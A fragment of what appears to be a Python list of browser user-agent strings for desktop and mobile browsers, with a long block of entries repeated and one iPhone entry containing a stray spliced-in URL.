'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
